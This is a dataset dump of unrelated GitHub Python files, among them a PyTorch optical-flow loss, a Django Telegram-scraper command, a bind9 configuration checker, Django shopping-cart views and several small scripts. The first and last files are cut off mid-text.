torch.tensor(0.).to(flow_gt.device)\n\n # Sample the indices from the set of points\n sampled_indices = torch.randint(0, points_a_valid[0].shape[0], (inst_edge_points[0].shape))\n points_a_sampled = (points_a_valid[0][sampled_indices], points_a_valid[1][sampled_indices], points_a_valid[2][sampled_indices], points_a_valid[3][sampled_indices])\n points_b_sampled = (points_b_valid[0][sampled_indices], points_b_valid[1][sampled_indices], points_b_valid[2][sampled_indices], points_b_valid[3][sampled_indices])\n\n # Compute the edge loss\n inst_edge_loss = self.computePairwiseLoss(flow_pred_iter, flow_gt, points_a_sampled, points_b_sampled)\n\n return inst_edge_loss\n\n def computeInstanceEdgeMap(self, po_mask):\n # Apply Sobel filter to get the X and Y gradients\n grad_x, grad_y = self.computeGradient(po_mask)\n grad_mag = torch.sqrt(grad_x.pow(2) + grad_y.pow(2))\n\n # Compute the instance edge map\n B, C, H, W = po_mask.shape\n inst_edge_map = torch.zeros((B, C, H, W), dtype=torch.bool).to(po_mask.device)\n for b in range(inst_edge_map.shape[0]):\n inst_edge_map[b, :, :, :] = grad_mag[b, :, :, :] > 0.5 # This implies change of label.\n\n # Zero out the edges of the image to prevent computation wastage\n inst_edge_map[b, :, :11, :] = 0\n inst_edge_map[b, :, H - 10:, :] = 0\n inst_edge_map[b, :, :, :11] = 0\n inst_edge_map[b, :, :, W - 10:] = 0\n\n return inst_edge_map, grad_x, grad_y, grad_mag\n\n def computeGradient(self, depth_pred):\n _, C, _, _ = depth_pred.shape\n\n grad_x_wts = torch.nn.Parameter(torch.tensor(self.sobel_x, dtype=torch.float32, requires_grad=False).expand(1, C // 1, 3, 3).to(depth_pred.device)) # (out_ch, in_ch // groups, H_K, W_K)\n grad_y_wts = torch.nn.Parameter(torch.tensor(self.sobel_y, dtype=torch.float32, requires_grad=False).expand(1, C // 1, 3, 3).to(depth_pred.device)) # (out_ch, in_ch // groups, H_K, W_K)\n sobel_conv_x = nn.Conv2d(1, 1, 3, 1, 1, padding_mode=\"replicate\").to(depth_pred.device)\n sobel_conv_y = nn.Conv2d(1, 1, 3, 1, 1, padding_mode=\"replicate\").to(depth_pred.device)\n sobel_conv_x.weight = grad_x_wts\n sobel_conv_y.weight = grad_y_wts\n\n grad_x = sobel_conv_x(depth_pred)\n grad_y = sobel_conv_y(depth_pred)\n\n return grad_x, grad_y\n\n def getNeighbourhoodPointPairs(self, edge_map, edge_points, grad_x, grad_y, grad_mag):\n points_count = edge_points[0].shape[0]\n H_min = 0\n H_max = edge_map.shape[2] - 1\n W_min = 0\n W_max = edge_map.shape[3] - 1\n\n batch = edge_points[0]\n channel = edge_points[1]\n edge_points_x = edge_points[2]\n edge_points_y = edge_points[3]\n\n edge_x_samp_a = torch.zeros((4 * points_count), dtype=torch.long).to(edge_map.device)\n edge_y_samp_a = torch.zeros((4 * points_count), dtype=torch.long).to(edge_map.device)\n edge_x_samp_b = torch.zeros((4 * points_count), dtype=torch.long).to(edge_map.device)\n edge_y_samp_b = torch.zeros((4 * points_count), dtype=torch.long).to(edge_map.device)\n\n delta_a = torch.randint(-self.nbd_max_limit, -self.nbd_min_limit, torch.Size([points_count]), device=edge_map.device).unsqueeze(0)\n delta_b = torch.randint(-self.nbd_max_limit, -self.nbd_min_limit, torch.Size([points_count]), device=edge_map.device).unsqueeze(0)\n delta_c = torch.randint(self.nbd_min_limit, self.nbd_max_limit, torch.Size([points_count]), device=edge_map.device).unsqueeze(0)\n delta_d = torch.randint(self.nbd_min_limit, self.nbd_max_limit, torch.Size([points_count]), device=edge_map.device).unsqueeze(0)\n delta = torch.cat([delta_a, delta_b, delta_c, delta_d], dim=0)\n\n batch_repeat = torch.repeat_interleave(batch, repeats=delta.shape[0], dim=0)\n channel_repeat = torch.repeat_interleave(channel, repeats=delta.shape[0], dim=0)\n batch_samp_a = batch_repeat\n ch_samp_a = channel_repeat\n batch_samp_b = batch_repeat\n ch_samp_b = channel_repeat\n\n grad_mag_pts = grad_mag[batch, channel, edge_points_x, edge_points_y]\n grad_x_pts = grad_x[batch, channel, edge_points_x, edge_points_y]\n grad_y_pts = grad_y[batch, channel, edge_points_x, edge_points_y]\n for sp_idx in range(delta.shape[0]):\n x_sample = edge_points_x + (delta[sp_idx] * grad_x_pts / grad_mag_pts).type(torch.long)\n y_sample = edge_points_y + (delta[sp_idx] * grad_y_pts / grad_mag_pts).type(torch.long)\n\n # Clamp the range of the indices\n x_sample[x_sample < H_min] = H_min\n x_sample[x_sample > H_max] = H_max\n y_sample[y_sample < W_min] = W_min\n y_sample[y_sample > W_max] = W_max\n\n sp_indices = torch.arange(0, 4 * points_count)\n\n edge_x_samp_a[(sp_indices % delta.shape[0]) == sp_idx] = x_sample\n edge_y_samp_a[(sp_indices % delta.shape[0]) == sp_idx] = y_sample\n\n edge_x_samp_b[(sp_indices % delta.shape[0]) == ((sp_idx + (delta.shape[0] - 1)) % delta.shape[0])] = x_sample\n edge_y_samp_b[(sp_indices % delta.shape[0]) == ((sp_idx + (delta.shape[0] - 1)) % delta.shape[0])] = y_sample\n\n return (batch_samp_a, ch_samp_a, edge_x_samp_a, edge_y_samp_a), (batch_samp_b, ch_samp_b, edge_x_samp_b, edge_y_samp_b)\n\n def computePairwiseLoss(self, flow_pred_iter, flow_gt, points_a_sampled, points_b_sampled):\n edge_loss = 0.0\n num_preds = len(flow_pred_iter)\n\n # Define the common tensors outside\n plusone_tensor = torch.ones_like(flow_gt)\n minusone_tensor = torch.ones_like(flow_gt) * -1\n zero_tensor = torch.zeros_like(flow_gt)\n\n for i in range(num_preds):\n i_weight = self.gamma ** (num_preds - i - 1)\n\n flow_pred_a = flow_pred_iter[i][points_a_sampled]\n flow_pred_b = flow_pred_iter[i][points_b_sampled]\n flow_gt_a = flow_gt[points_a_sampled]\n flow_gt_b = flow_gt[points_b_sampled]\n\n plusone_condition = flow_gt_a / flow_gt_b >= 1 + self.pointwise_thresh\n minusone_condition = flow_gt_a / flow_gt_b <= 1 / (1 + self.pointwise_thresh)\n l = torch.where(plusone_condition, plusone_tensor, torch.where(minusone_condition, minusone_tensor, zero_tensor))\n\n pairwise_loss = torch.where(l == zero_tensor,\n (flow_pred_a - flow_pred_b).pow(2), # True\n torch.log(1 + torch.exp(-l * (flow_pred_a - flow_pred_b)))).mean()\n\n edge_loss += i_weight * pairwise_loss\n\n return edge_loss","repo_name":"cvcore/future-prediction","sub_path":"thirdparty/efficientPS/efficientPS/algos/optical_flow.py","file_name":"optical_flow.py","file_ext":"py","file_size_in_byte":19146,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"17942949912","text":"from django.core.management.base import BaseCommand\nfrom telethon.sync import TelegramClient\nfrom scraper.src import crawl\nfrom scraper.models import TelegramAccount\nfrom marketing.models import MarketingPlan\nfrom django.conf import settings\nfrom telethon.sessions import StringSession\n# from scraper.models import ScraperStatus\n# Import your scraping functions or classes here\n\nclass Command(BaseCommand):\n help = 'Scrape data and save in the database'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--conversation',\n action='store_true',\n help='Scrape Conversations(Groups and Private Chats)'\n )\n parser.add_argument(\n '--user',\n action='store_true',\n help='Scrape Users in Groups'\n )\n parser.add_argument(\n '--user_message',\n action='store_true',\n help='Scrape Users in SuperGroups With Message'\n )\n parser.add_argument(\n '--check_deep_crawl',\n action='store_true',\n help='Check Deep Crawl Groups'\n )\n parser.add_argument(\n '--clean_db',\n action='store_true',\n help='Clean Database'\n )\n parser.add_argument(\n '--clean_channel',\n action='store_true',\n help='Clean Channel'\n )\n parser.add_argument(\n '--invite_user_to_group',\n action='store_true',\n help='Invite User To Group'\n )\n\n def handle(self, *args, **options):\n account = TelegramAccount.objects.filter()\n marketing_plan = MarketingPlan.objects.first()\n for acc in account:\n client = TelegramClient(StringSession(acc.session), acc.api_id, acc.api_hash)\n client.connect()\n if not client.is_user_authorized():\n client.send_code_request(acc.phone_number)\n client.sign_in(acc.phone_number, input('Enter the code: '))\n acc.session = StringSession.save(client.session)\n acc.save()\n\n if options['conversation']:\n self.stdout.write(self.style.SUCCESS('Start Scraping Conversations...'))\n crawl.get_conversations(client)\n elif options['user']:\n self.stdout.write(self.style.SUCCESS('Start Scraping Users in Groups...'))\n crawl.get_users_in_group(client)\n elif options['user_message']:\n self.stdout.write(self.style.SUCCESS('Start Scraping Users in SuperGroups With Message...'))\n crawl.get_users_in_group_with_message(client)\n elif options['clean_db']:\n self.stdout.write(self.style.SUCCESS('Start Cleaning Database Zero Member Group And Fake User...'))\n crawl.clean_db()\n elif options['clean_channel']:\n self.stdout.write(self.style.SUCCESS('Start Cleaning Channel...'))\n crawl.clean_channel(client)\n elif options['invite_user_to_group']:\n self.stdout.write(self.style.SUCCESS('Start Inviting Users To Group...'))\n crawl.invite_users_to_channel(client, marketing_plan)\n","repo_name":"itsmohsenjalali/telegram_scraper","sub_path":"scraper/management/commands/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71875893974","text":"import os\nfrom os import popen\nimport stat\nimport psutil\nimport grp\n\nfrom sv2.helpers import run_checkers\n\n\nsummary = \"Check bind9\"\n\nreport = None\n\n\nclass Bind9:\n\n def check_user(self):\n for process in psutil.process_iter():\n if process.name() == \"named\":\n if process.username() == \"root\":\n report.new_issue(\"Run bind9 with non-root user.\")\n\n def check_perms(self):\n binddir = os.stat(\"/etc/bind\")\n if binddir.st_uid != 0:\n report.new_issue(\"Owner of /etc/bind should be root.\")\n if grp.getgrgid(binddir.st_gid).gr_name != \"bind\":\n report.new_issue(\"Group of /etc/bind should be bind.\")\n perms = os.stat(\"/etc/bind\")\n if stat.filemode(perms.st_mode)[-1] != \"-\":\n report.new_issue(\"Users should have not access to /etc/bind\")\n\n def check_allow(self):\n with popen(\"/usr/bin/named-checkconf -p 2> /dev/null\") as p:\n conf = p.read()\n if \"allow-recursion\" not in conf:\n report.new_issue(\n \"Use allow-recursion to restric recursive queries to trusted clients.\")\n if \"allow-query\" not in conf:\n report.new_issue(\n \"Use allow-query to restric queries to trusted clients.\")\n if \"allow-transfer\" not in conf:\n report.new_issue(\n \"Use allow-transfer to restirct zone transfer to trusted hosts.\")\n\n\ndef run(r, opts):\n global report\n report = r\n c = Bind9()\n run_checkers(c, opts)\n\n\ndef makes_sense(r) -> bool:\n # We should extent the check to ensure that this is not another program\n # with the same name.\n for process in psutil.process_iter():\n if process.name() == \"named\":\n return True\n\n r.wont_run(\"Bind9 is not running\")\n return False\n","repo_name":"OSPG/sv2","sub_path":"sv2_checkers/bind9.py","file_name":"bind9.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41008701987","text":"def check_number(array, index, n=25):\n if index <= 24:\n return False\n preamble = array[index - n:index]\n for i in preamble:\n if (array[index] - i) in preamble:\n if (i * 2 == array[index] and preamble.count(i) >= 2) or (i * 2 != array[index]):\n return True\n return False\n\nwith open('input.txt') as fin:\n numbers = [int(i.replace('\\n', '')) for i in fin.readlines()]\n\nfor i in range(25, len(numbers)):\n if not check_number(numbers, i):\n invalid_number = numbers[i]\n print(numbers[i])\n\nfor start in range(len(numbers) - 1):\n weakness = []\n for end in range(start + 1, len(numbers)):\n s = sum(numbers[start:end])\n if s < invalid_number:\n continue\n elif s == invalid_number:\n weakness = numbers[start:end]\n break\n elif s > invalid_number:\n break\n if weakness:\n break\n\nprint(min(weakness) + max(weakness))\n","repo_name":"Davidyz/learning_python","sub_path":"advent/day9/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"74651218134","text":"#To calculate factorial\n\ndef factorial(x):\n if x == 1:\n return 1\n else:\n return (x * factorial(x-1))\n\n\nprint(\"Calculate the number of permutations possible (nPr)\")\n\n#to get the input\n\nn=int(input(\"Total number of objects (n): \"))\nr=int(input(\"Number of objects selected (r): \"))\n\n#to check calculation possible\n\nif n>=r:\n #calculations of permutation\n n_min_r=n-r\n n_fac = factorial(n)\n n_min_r_fac = factorial(n_min_r)\n nPr=int(n_fac/n_min_r_fac)\n print(\"Number of permutations possible (nPr) is\",nPr)\nelse:\n print(\"Number of objects selected cannot be more than Total objects\")\n","repo_name":"CodeMacrocosm/Algo-a-Thon-22","sub_path":"Algos/Python/Permutations calculator.py","file_name":"Permutations calculator.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"67"} +{"seq_id":"71380317974","text":"from api import logger\nfrom api.hotel.adapters.priceline.priceline_adapter import PricelineAdapter\nfrom api.hotel.adapters.priceline.priceline_transport import PricelineTransport\nfrom api.hotel.parsers import priceline_loader\nfrom api.models.models import ProviderChain, Provider\n\n\nclass PricelineHotelChainsParser:\n def __init__(self, transport):\n self.transport = transport\n self.provider = Provider.objects.get_or_create(name=PricelineAdapter.get_provider_name())[0]\n\n def execute(self, limit=None, chunk_size=5000):\n total_loaded = 0\n parser_type = PricelineTransport.Endpoint.HOTEL_CHAINS\n priceline_hotel_chains = priceline_loader.load_data(self.transport, parser_type, chunk_size=chunk_size)\n for results in priceline_hotel_chains:\n models = list(map(self.parse_model, results))\n ProviderChain.objects.bulk_create(models)\n\n total_loaded += len(models)\n if limit and total_loaded >= limit:\n logger.info(f\"Limit of {limit} reached. Exiting.\")\n return\n\n def parse_model(self, result):\n provider_code = result[\"chain_id_ppn\"]\n chain_name = result[\"chain_name\"]\n\n return ProviderChain(provider=self.provider, provider_code=provider_code, chain_name=chain_name)\n\n def remove_old_data(self):\n ProviderChain.objects.filter(provider=self.provider).delete()\n","repo_name":"Shing-Ho/sn-api","sub_path":"api/hotel/parsers/priceline_chains_parser.py","file_name":"priceline_chains_parser.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16940882011","text":"import maya.cmds as cmds\nimport pymel.core as pm\n\nfrom . import aniPublisherModels as apMdl\nfrom . import aniPublisherUI as apUI\n\nfrom . import utils\n\nreload(apMdl)\nreload(apUI)\nreload(utils)\n\n\nclass AniPublisherCtrl(object):\n def __init__(self):\n self.aniPub = None\n self.aniPubUI = None\n self.settings = utils.getSettings()\n\n self.__validRefNodes = []\n self.__rigRefNodes = []\n\n def showUI(self):\n self.__getValidRefNodes()\n self.__getRigRefNodes()\n\n self.aniPub = apMdl.AniPublisher()\n\n for refNode in self.__rigRefNodes:\n pubItem = apMdl.PublishItem(refNode)\n self.aniPub.addItem(pubItem)\n\n self.aniPubUI = apUI.AniPublisherUI(self.aniPub)\n\n self.aniPubUI.show()\n\n def __getRigRefNodes(self):\n rigRefNodes = []\n\n for refNode in self.__validRefNodes:\n refNamespace = cmds.referenceQuery(refNode, namespace=True)\n if cmds.objExists('{0}:{1}'.format(refNamespace, self.settings['exportSetName'])):\n rigRefNodes.append(refNode)\n\n self.__rigRefNodes = rigRefNodes\n\n def __getValidRefNodes(self):\n validRefNodes = []\n\n refNodes = cmds.ls(type='reference')\n for refNode in refNodes:\n try: # Empty reference node\n cmds.referenceQuery(refNode, filename=True)\n except:\n continue\n\n if not cmds.referenceQuery(refNode, isLoaded=True): # Not loaded refrence node\n continue\n\n validRefNodes.append(refNode)\n\n self.__validRefNodes = validRefNodes\n","repo_name":"LEESANGTAK/takAniPublisher","sub_path":"Contents/scripts/takAniPublisher/aniPublisherCtrl.py","file_name":"aniPublisherCtrl.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5825282843","text":"import argparse\nimport re\n\nparser = argparse.ArgumentParser(description=\"Scan words from User Input file or specified argument file.\")\nparser.add_argument(\"-i\", \"--infile\", metavar=\"\", help=\"Specify a word File to scan\")\nargs = parser.parse_args()\n\nqp = re.compile(r'^q$|^quit$', re.I)\n\n\ndef count_lines_words(arg1, lcnt):\n with open(arg1, 'r') as wrdfile:\n print(\"Filename to scan is: \" + wrdfile.name, \"\\n\")\n for ln in wrdfile.readlines(): # type: str\n wrds = ln.split()\n print(\"Line\", lcnt, \"has\", len(wrds), \"words\")\n lcnt += 1\n\ndef quitout(qarg, ec):\n if qp.search(qarg):\n print(\"Quiting at users request...\")\n exit(code=ec)\n\nif args.infile:\n INFILE = args.infile\nelse:\n INFILE = input(\"Type in a Filename to scan or (q|Q) to quit: \")\n quitout(INFILE, 1)\n\ncount_lines_words(INFILE, 1)\nprint(\"\")\n\nwhile True:\n sword = input(\"Type in a word to scan in this input file or (q|Q) to quit: \")\n quitout(sword, 0)\n wp = re.compile(r'\\b' + sword + r'\\b', re.I)\n cnt, lary = 1, []\n with open(INFILE, 'r') as file1:\n for l in file1.readlines():\n if wp.search(l):\n lary.append(cnt)\n cnt += 1\n if len(lary) > 0:\n rpwrd = len(lary) - 1\n print(\"Found word:\", sword, \"1st in line:\", lary[0], \"and is repeated again\", rpwrd, \"time(s) in this file.\")\n else:\n print(\"Word \", sword, \"not found in this file.\")\nexit(code=0)\n","repo_name":"anantpbhat/Python","sub_path":"word_scan.py","file_name":"word_scan.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18979592517","text":"import signal\nimport sys\nimport time\nimport Ice\n\nIce.loadSlice('Fibonacci.ice')\nimport Demo\n\n\ndef run(communicator):\n fibonacci = Demo.FibonacciPrx.uncheckedCast(communicator.propertyToProxy('Fibonacci.Proxy'))\n\n try:\n v = fibonacci.compute(-1)\n assert False\n except Demo.InvalidValue:\n pass # expected\n\n print(\"computing fibonacci number 35...\")\n start = time.perf_counter()\n v = fibonacci.compute(35)\n printResult(v, start)\n\n print(\"computing fibonacci number 36...\")\n start = time.perf_counter()\n v = fibonacci.compute(36)\n printResult(v, start)\n\n print(\"retrieving again fibonacci number 35...\")\n start = time.perf_counter()\n v = fibonacci.compute(35)\n printResult(v, start)\n\n print(\"retrieving again fibonacci number 36...\")\n start = time.perf_counter()\n v = fibonacci.compute(36)\n printResult(v, start)\n\n print(\"clearing cache\")\n fibonacci.clearCache()\n\n # We can see from the log timestamps the numbers are indeed computed in parallel.\n print(\"computing fibonacci number 35 and 36 in parallel...\")\n start = time.perf_counter()\n fa = fibonacci.computeAsync(35)\n fb = fibonacci.computeAsync(36)\n va = fa.result()\n vb = fb.result()\n printResult(f\"{va} and {vb}\", start)\n\n print(\"shutting down server\")\n fibonacci.shutdown()\n\n\ndef printResult(result, start):\n print(f\"result is {result}, took {time.perf_counter() - start:.2f}s\")\n\n\n# Ice.initialize returns an initialized Ice communicator, and this the communicator is destroyed once it goes out of\n# scope.\nwith Ice.initialize(sys.argv, \"config.client\") as communicator:\n\n # Install a signal handler to destroy the communicator on Ctrl-C\n signal.signal(signal.SIGINT, lambda signum, handler: communicator.destroy())\n\n # The communicator initialization removes all Ice-related arguments from argv\n if len(sys.argv) > 1:\n print(sys.argv[0] + \": too many arguments\")\n sys.exit(1)\n\n run(communicator)\n","repo_name":"zeroc-ice/ice-demos","sub_path":"python/Ice/coroutine/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":316,"dataset":"github-code","pt":"67"} +{"seq_id":"28243543713","text":"from django.shortcuts import render\nfrom django.views.generic import View\nfrom django.http import JsonResponse\nfrom goods.models import GoodsSKU\nfrom django_redis import get_redis_connection\nimport json\n\n\n# Create your views here.\n\n\nclass DeleteCartView(View):\n \"\"\"删除购物车记录:一次删除一条\"\"\"\n\n def post(self, request):\n\n # 接收参数:sku_id\n sku_id = request.POST.get('sku_id')\n\n # 校验参数:not,判断是否为空\n if not sku_id:\n return JsonResponse({'code':1, 'message':'sku_id为空'})\n\n # 判断sku_id是否合法\n try:\n sku = GoodsSKU.objects.get(id=sku_id)\n except GoodsSKU.DoesNotExist:\n return JsonResponse({'code':2, 'message':'要删除的商品不存在'})\n\n # 判断用户是否登录\n if request.user.is_authenticated():\n # 如果用户登陆,删除redis中购物车数据\n redis_conn = get_redis_connection('default')\n user_id = request.user.id\n redis_conn.hdel('cart_%s' % user_id, sku_id)\n\n else:\n # 如果用户未登陆,删除cookie中购物车数据\n cart_json = request.COOKIES.get('cart')\n if cart_json is not None:\n cart_dict = json.loads(cart_json)\n\n # 删除字典中某个key及对应的内容\n del cart_dict[sku_id]\n\n # 将最新的cart_dict,转成json字符串\n new_cart_json = json.dumps(cart_dict)\n\n # 删除结果写入cookie\n response = JsonResponse({'code': 0, 'message': '删除成功'})\n response.set_cookie('cart', new_cart_json)\n\n return response\n\n return JsonResponse({'code': 0, 'message': '删除成功'})\n\n\nclass UpdateCartView(View):\n \"\"\"更新购物车信息\"\"\"\n\n def post(self, request):\n \"\"\"+ - 手动输入\"\"\"\n\n # 获取参数:sku_id, count\n sku_id = request.POST.get('sku_id')\n count = request.POST.get('count')\n\n # 校验参数all()\n if not all([sku_id, count]):\n return JsonResponse({'code': 1, 'message':'缺少参数'})\n\n # 判断商品是否存在\n try:\n sku = GoodsSKU.objects.get(id=sku_id)\n except GoodsSKU.DoesNotExist:\n return JsonResponse({'code': 2, 'message': '商品不存在'})\n\n # 判断count是否是整数\n try:\n count = int(count)\n except Exception:\n return JsonResponse({'code': 3, 'message': '商品数量错误'})\n\n # 判断库存\n if count > sku.stock:\n return JsonResponse({'code': 4, 'message': '库存不足'})\n\n # 判断用户是否登陆\n if request.user.is_authenticated():\n # 如果用户登陆,将修改的购物车数据存储到redis中\n redis_conn = get_redis_connection('default')\n user_id = request.user.id\n\n # 因为我们设计的接口是幂等的风格.传入的count就是用户最后要记录的商品的数量\n redis_conn.hset('cart_%s' % user_id, sku_id, count)\n\n return JsonResponse({'code': 0, 'message': '更新购物车成功'})\n else:\n # 如果用户未登陆,将修改的购物车数据存储到cookie中\n cart_json = request.COOKIES.get('cart')\n if cart_json is not None:\n cart_dict = json.loads(cart_json)\n else:\n cart_dict = {}\n\n # 因为我们设计的接口是幂等的风格.传入的count就是用户最后要记录的商品的数量\n cart_dict[sku_id] = count\n\n # 把cart_dict转成最新的json字符串\n new_cart_json = json.dumps(cart_dict)\n\n # 更新cookie中的购物车信息\n response = JsonResponse({'code': 0, 'message': '更新购物车成功'})\n response.set_cookie('cart', new_cart_json)\n\n return response\n\n\nclass CartInfoView(View):\n \"\"\"购物车信息\"\"\"\n\n def get(self, request):\n \"\"\"登录和未登录时查询购物车数据,并渲染\"\"\"\n\n if request.user.is_authenticated():\n # 用户已登录时,查询redis中购物车数据\n redis_conn = get_redis_connection('default')\n user_id = request.user.id\n # 如果字典是通过redis_conn.hgetall()得到的,那么字典的key和value信息都是bytes类型\n cart_dict = redis_conn.hgetall('cart_%s' % user_id)\n else:\n # 用户未登录时,查询cookie中的购物车数据\n cart_json = request.COOKIES.get('cart')\n if cart_json is not None:\n # 如果cart_dict字典从cookie中得到的,那么key是字符串,value是int\n cart_dict = json.loads(cart_json)\n else:\n cart_dict = {}\n\n # 定义临时变量\n skus = []\n total_count = 0\n total_sku_amount = 0\n\n # cart_dict = {sku_id1:count1, sku_id2:count2}\n for sku_id, count in cart_dict.items():\n\n try:\n sku = GoodsSKU.objects.get(id=sku_id)\n except GoodsSKU.DoesNotExist:\n continue # 有异常,跳过.展示没有异常的数据\n\n # 统一count的数据类型为int,方便后续代码的计算和比较\n count = int(count)\n # 小计\n amount = count * sku.price\n\n # 提示:python是动态的面向对象的语言,所以可以动态的给sku对象添加属性,存储count和amount\n sku.count = count\n sku.amount = amount\n # 记录sku\n skus.append(sku)\n\n # 总金额和总计\n total_sku_amount += amount\n total_count += count\n\n # 构造上下文\n context = {\n 'skus':skus,\n 'total_sku_amount':total_sku_amount,\n 'total_count':total_count\n }\n\n # 渲染模板\n return render(request, 'cart.html', context)\n\n\nclass AddCartView(View):\n \"\"\"添加到购物车\"\"\"\n\n def post(self, request):\n \"\"\"接受购物车参数,校验购物车参数,保存购物车参数\"\"\"\n\n # 判断用户是否登录\n # if not request.user.is_authenticated():\n # return JsonResponse({'code':1, 'message':'用户未登录'})\n\n # 接受购物车参数 : sku_id, count\n sku_id = request.POST.get('sku_id')\n count = request.POST.get('count')\n\n # 校验参数 : all()\n if not all([sku_id, count]):\n return JsonResponse({'code':2, 'message':'缺少参数'})\n\n # 判断sku_id是否合法\n try:\n sku = GoodsSKU.objects.get(id=sku_id)\n except GoodsSKU.DoesNotExist:\n return JsonResponse({'code':3, 'message': '商品不存在'})\n\n # 判断count是否合法\n try:\n count = int(count)\n except Exception:\n return JsonResponse({'code':4, 'message': '商品数量错误'})\n\n # 判断库存是否超出\n if count > sku.stock:\n return JsonResponse({'code':5, 'message': '库存不足'})\n\n if request.user.is_authenticated():\n\n # 获取user_id\n user_id = request.user.id\n\n # 保存购物车数据到Redis\n redis_conn = get_redis_connection('default')\n # 需要查询要保存到购物车的商品数据是否存在,如果存在,需要累加,反之,赋新值\n origin_count = redis_conn.hget('cart_%s' % user_id, sku_id)\n if origin_count is not None:\n count += int(origin_count) # django_redis保存的hash类型的数据是bytes类型的\n\n # 再次:判断库存是否超出,拿着最终的结果和库存比较\n if count > sku.stock:\n return JsonResponse({'code': 5, 'message': '库存不足'})\n\n redis_conn.hset('cart_%s' % user_id, sku_id, count)\n\n # 查询购物车中的商品数量,响应给前端\n cart_num = 0\n cart_dict = redis_conn.hgetall('cart_%s' % user_id)\n for val in cart_dict.values():\n cart_num += int(val)\n\n # 响应结果\n return JsonResponse({'code':0, 'message': '添加购物车成功', 'cart_num':cart_num})\n else:\n # 用户未登录,保存购物车数据到cookie {sku_id:count}\n # 读取cookie中的购物车数据\n cart_json = request.COOKIES.get('cart')\n if cart_json is not None:\n # 把cart_json转成字典 : loads 将json字符串转成json字典\n cart_dict = json.loads(cart_json)\n else:\n cart_dict = {} # 为了后面继续很方便的操作购物车数据,这里定义空的字典对象\n\n # 判断要存储的商品信息,是否已经存在.如果已经存在就累加.反之,赋新值\n # 提醒 : 需要保证 sku_id和cart_dict里面的key的类型一致;此处的正好一致\n if sku_id in cart_dict:\n origin_count = cart_dict[sku_id] # origin_count : 在json模块中,数据类型不变\n count += origin_count\n\n # 再再次:判断库存是否超出,拿着最终的结果和库存比较\n if count > sku.stock:\n return JsonResponse({'code': 5, 'message': '库存不足'})\n\n # 把最新的商品的数量,赋值保存到购物车字典\n cart_dict[sku_id] = count\n\n # 在写入cookie之前,将cart_dict转成json字符串\n new_cart_json = json.dumps(cart_dict)\n\n # 为了方便前端展示最新的购物车数量,后端添加购物车成功后,需要查询购物车\n cart_num = 0\n for val in cart_dict.values():\n cart_num += val # val 是json模块运作的,存储的市数字,读取的也是数字\n\n # 创建response\n response = JsonResponse({'code':0, 'message':'添加购物车成功', 'cart_num':cart_num})\n\n # 写入cookie\n response.set_cookie('cart', new_cart_json)\n\n return response\n","repo_name":"zxallen/Django_T","sub_path":"apps/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10217,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"12957467998","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 16 11:40:16 2018\n\n@author: Brenda\n\"\"\"\n\nimport pandas\nimport numpy\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\n#load dataset from the csv file in the dataframe called nesarc_data\ngapminder_data = pandas.read_csv('gapminder.csv',low_memory=False)\n\n#set PANDAS to show all columns in Data frame\npandas.set_option('display.max_columns', None)\n\n#set PANDAS to show all rows in Data frame\npandas.set_option('display.max_rows', None)\n\n#replace blanks with Nan\ngapminder_data['internetuserate']=gapminder_data['internetuserate'].replace(\" \", numpy.NaN)\ngapminder_data['urbanrate']=gapminder_data['urbanrate'].replace(\" \", numpy.NaN)\n\n\n#numeric variables that are read into python from the csv file as strings (objects)\n#with empty cells should be converted back to numeric format using convert_objects function\ngapminder_data['internetuserate'] = pandas.to_numeric(gapminder_data['internetuserate'])\ngapminder_data['urbanrate'] = pandas.to_numeric(gapminder_data['urbanrate'])\n\n\n#regression for association between urbandrate (explanatory, numerical) and internet use rate (response, numerical)\nprint('OLS regression model for the association between urbanrate and internet use rate')\nreg1 = smf.ols('internetuserate ~ urbanrate',data=gapminder_data).fit()\nprint(reg1.summary())\n\n\n\n\n\n\n","repo_name":"BusinessAnalyticsWIT/BA2-2019","sub_path":"topic-05-Regression-Clustering/book-a/archives/lab07.py","file_name":"lab07.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13792618992","text":"import logging\nimport os\nimport urllib.request\nimport zipfile\n\nimport pandas as pd\nfrom tqdm import tqdm\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass DownloadProgressbar(tqdm):\n def update_to(self, block=1, block_size=1, total_size=None):\n if total_size is not None:\n self.total = total_size\n self.update(block * block_size - self.n)\n\n\ndef download_raw_data(url: str, output_path: str):\n with DownloadProgressbar(unit=\"B\", unit_scale=True, miniters=1, desc=output_path) as t_bar:\n urllib.request.urlretrieve(url, filename=output_path, reporthook=t_bar.update_to)\n\n\ndef open_raw_data(path_to_data: str, exp_type: str, exp_id: int, user_id: int) -> pd.DataFrame:\n filename = f\"{exp_type}_exp{exp_id:02d}_user{user_id:02d}.txt\"\n filedir = os.path.join(path_to_data, \"RawData\", filename)\n activity = pd.read_csv(filedir, sep=\" \", header=None, names=[\"x\", \"y\", 